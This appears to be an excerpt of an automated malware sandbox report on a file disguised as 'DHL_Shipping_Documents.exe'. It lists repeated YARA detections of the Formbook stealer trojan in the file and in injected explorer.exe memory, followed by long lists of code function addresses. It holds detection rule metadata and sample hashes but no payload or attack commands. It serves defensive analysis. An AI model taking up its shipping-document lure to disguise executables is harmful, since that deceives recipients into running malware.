Source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3461422392.000000000E916000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: DHL_Shipping_Documents.exe PID: 4496, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: DHL_Shipping_Documents.exe PID: 1360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 2504, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_015E4B00	0_2_015E4B00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_015E4AB8	0_2_015E4AB8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_015ED3C4	0_2_015ED3C4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_05629F08	0_2_05629F08
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_0562BE58	0_2_0562BE58
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_05BE15D0	0_2_05BE15D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00401208	2_2_00401208
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041ECED	2_2_0041ECED
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041E56E	2_2_0041E56E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041DD30	2_2_0041DD30
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00409E5D	2_2_00409E5D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041D7B5	2_2_0041D7B5
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01592106	2_2_01592106
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158E1B6	2_2_0158E1B6
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159A012	2_2_0159A012
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015840E0	2_2_015840E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D00A0	2_2_014D00A0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A00A3	2_2_015A00A3
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EE340	2_2_014EE340
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A024E	2_2_015A024E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A227F	2_2_014A227F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A227C	2_2_014A227C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01504700	2_2_01504700
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DC720	2_2_014DC720
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E2790	2_2_014E2790
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EA790	2_2_014EA790
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FC640	2_2_014FC640
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015AA666	2_2_015AA666
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157C9EF	2_2_0157C9EF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A285E	2_2_014A285E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C6868	2_2_014C6868
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159A800	2_2_0159A800
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F68C2	2_2_014F68C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01596897	2_2_01596897
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E8B0	2_2_0150E8B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159CB53	2_2_0159CB53
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B50	2_2_014E0B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159EB9B	2_2_0159EB9B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159EAE6	2_2_0159EAE6
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40	2_2_014DAD40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F8D1F	2_2_014F8D1F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2DF0	2_2_014F2DF0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158ED8C	2_2_0158ED8C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0DA9	2_2_014E0DA9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01596DA9	2_2_01596DA9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159EDA0	2_2_0159EDA0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EAC50	2_2_014EAC50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0C52	2_2_014D0C52
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155EC70	2_2_0155EC70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01554C00	2_2_01554C00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01582C00	2_2_01582C00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01522F08	2_2_01522F08
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D2F28	2_2_014D2F28
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014ECF30	2_2_014ECF30
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01590FED	2_2_01590FED
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580FBD	2_2_01580FBD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015AAE2B	2_2_015AAE2B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01500EE0	2_2_01500EE0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0151514C	2_2_0151514C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EB100	2_2_014EB100
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CF113	2_2_014CF113
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E51F0	2_2_014E51F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E7010	2_2_014E7010
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159F0FF	2_2_0159F0FF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0152734A	2_2_0152734A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D13C0	2_2_014D13C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159138C	2_2_0159138C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01597231	2_2_01597231
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FB220	2_2_014FB220
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CD2EC	2_2_014CD2EC
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157D280	2_2_0157D280
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A9283	2_2_015A9283
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015755E0	2_2_015755E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159F470	2_2_0159F470
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154D4C0	2_2_0154D4C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157D77C	2_2_0157D77C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01581773	2_2_01581773
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159F709	2_2_0159F709
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01597706	2_2_01597706
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155372C	2_2_0155372C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158D786	2_2_0158D786
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01525610	2_2_01525610
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159F9B2	2_2_0159F9B2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159F836	2_2_0159F836
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E3830	2_2_014E3830
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015598F5	2_2_015598F5
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015558B0	2_2_015558B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E98A0	2_2_014E98A0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FB8B0	2_2_014FB8B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A9B78	2_2_014A9B78
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FFB30	2_2_014FFB30
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0151DBD9	2_2_0151DBD9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159FBC9	2_2_0159FBC9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01591A1A	2_2_01591A1A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01597A33	2_2_01597A33
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01525A80	2_2_01525A80
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FFD70	2_2_014FFD70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01579DE8	2_2_01579DE8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159FC6E	2_2_0159FC6E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01571CD0	2_2_01571CD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E3C90	2_2_014E3C90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157FF44	2_2_0157FF44
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155FFA0	2_2_0155FFA0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01593E62	2_2_01593E62
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159FE67	2_2_0159FE67
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E9E00	2_2_014E9E00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01567E38	2_2_01567E38
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E1EE2	2_2_014E1EE2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01597E8C	2_2_01597E8C
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B3232	3_2_0E7B3232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7ADB32	3_2_0E7ADB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7ADB30	3_2_0E7ADB30
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B2036	3_2_0E7B2036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7A9082	3_2_0E7A9082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B0912	3_2_0E7B0912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7AAD02	3_2_0E7AAD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B65CD	3_2_0E7B65CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8FE232	3_2_0E8FE232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8F4082	3_2_0E8F4082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8FD036	3_2_0E8FD036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E9015CD	3_2_0E9015CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8F5D02	3_2_0E8F5D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8FB912	3_2_0E8FB912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8F8B32	3_2_0E8F8B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8F8B30	3_2_0E8F8B30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05180485	4_2_05180485
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051A4700	4_2_051A4700
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0517C720	4_2_0517C720
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05182790	4_2_05182790
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0518A790	4_2_0518A790
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0524A666	4_2_0524A666
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0519C640	4_2_0519C640
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051806C0	4_2_051806C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05232106	4_2_05232106
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0522E1B6	4_2_0522E1B6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523A012	4_2_0523A012
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_052400A3	4_2_052400A3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051700A0	4_2_051700A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_052240E0	4_2_052240E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0518E340	4_2_0518E340
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0514227C	4_2_0514227C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0524024E	4_2_0524024E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0514227F	4_2_0514227F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05198D1F	4_2_05198D1F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0517AD40	4_2_0517AD40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523EDA0	4_2_0523EDA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05236DA9	4_2_05236DA9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0522ED8C	4_2_0522ED8C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05180DA9	4_2_05180DA9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05192DF0	4_2_05192DF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051F4C00	4_2_051F4C00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05222C00	4_2_05222C00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05170C52	4_2_05170C52
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0518AC50	4_2_0518AC50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051FEC70	4_2_051FEC70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051C2F08	4_2_051C2F08
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0518CF30	4_2_0518CF30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05172F28	4_2_05172F28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05220FBD	4_2_05220FBD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05230FED	4_2_05230FED
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0524AE2B	4_2_0524AE2B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051A0EE0	4_2_051A0EE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05220985	4_2_05220985
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0521C9EF	4_2_0521C9EF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0517E9E0	4_2_0517E9E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523A800	4_2_0523A800
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0514285E	4_2_0514285E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05166868	4_2_05166868
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051AE8B0	4_2_051AE8B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05236897	4_2_05236897
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051968C2	4_2_051968C2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051828F0	4_2_051828F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05180B50	4_2_05180B50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523CB53	4_2_0523CB53
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523EB9B	4_2_0523EB9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523EAE6	4_2_0523EAE6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_052155E0	4_2_052155E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523F470	4_2_0523F470
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051ED4C0	4_2_051ED4C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05237706	4_2_05237706
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523F709	4_2_0523F709
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051F372C	4_2_051F372C
